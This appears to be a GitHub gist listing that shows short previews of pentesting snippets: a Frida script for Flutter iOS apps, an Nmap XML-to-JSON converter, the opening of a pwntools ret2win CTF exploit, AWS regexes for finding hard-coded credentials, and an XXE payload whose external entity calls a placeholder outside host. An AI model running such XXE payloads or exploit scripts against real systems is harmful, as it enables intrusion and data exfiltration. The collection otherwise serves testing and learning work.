Also see: AWS CLI Setup
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/** | |
* run the script to a running app: frida -U "appName" -l flutter_ios.js --no-pause | |
* start app direct with the script: frida -Uf bundleIdentifier -l flutter_ios.js --no-pause | |
*/ | |
// ############################################# | |
// HELPER SECTION START | |
var colors = { | |
"resetColor": "\x1b[0m", | |
"green": "\x1b[32m", | |
"yellow": "\x1b[33m", |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import json,xmltodict | |
""" | |
Nmap XML Output to Json Output in Python | |
example : data = xml2json('nmap_output.xml') | |
""" | |
def xml2json(xml): | |
xmlfile = open(xml) | |
xml_content = xmlfile.read() | |
xmlfile.close() | |
xmljson = json.dumps(xmltodict.parse(xml_content), indent=4, sort_keys=True) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
# Set up pwntools to work with this binary | |
elf = context.binary = ELF('ret2win') | |
# Enable verbose logging so we can see exactly what is being sent. | |
context.log_level = 'debug' | |
# Print out the target address | |
info("%#x target", elf.symbols.ret2win) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
url - https://aws.amazon.com/blogs/security/a-safer-way-to-distribute-aws-credentials-to-ec2/ | |
Finding hard-coded credentials in your code | |
Hopefully you’re excited about deploying credentials to EC2 that are automatically rotated. Now that you’re using Roles, a good security practice would be to go through your code and remove any references to AKID/Secret. We suggest running the following regular expressions against your code base: | |
Search for access key IDs: (?<![A-Z0-9])[A-Z0-9]{20}(?![A-Z0-9]). In English, this regular expression says: Find me 20-character, uppercase, alphanumeric strings that don’t have any uppercase, alphanumeric characters immediately before or after. | |
Search for secret access keys: (?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=]). In English, this regular expression says: Find me 40-character, base-64 strings that don’t have any base 64 characters immediately before or after. | |
If grep is your preferred tool, run a recursive, Perl-compatible search using the following commands |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |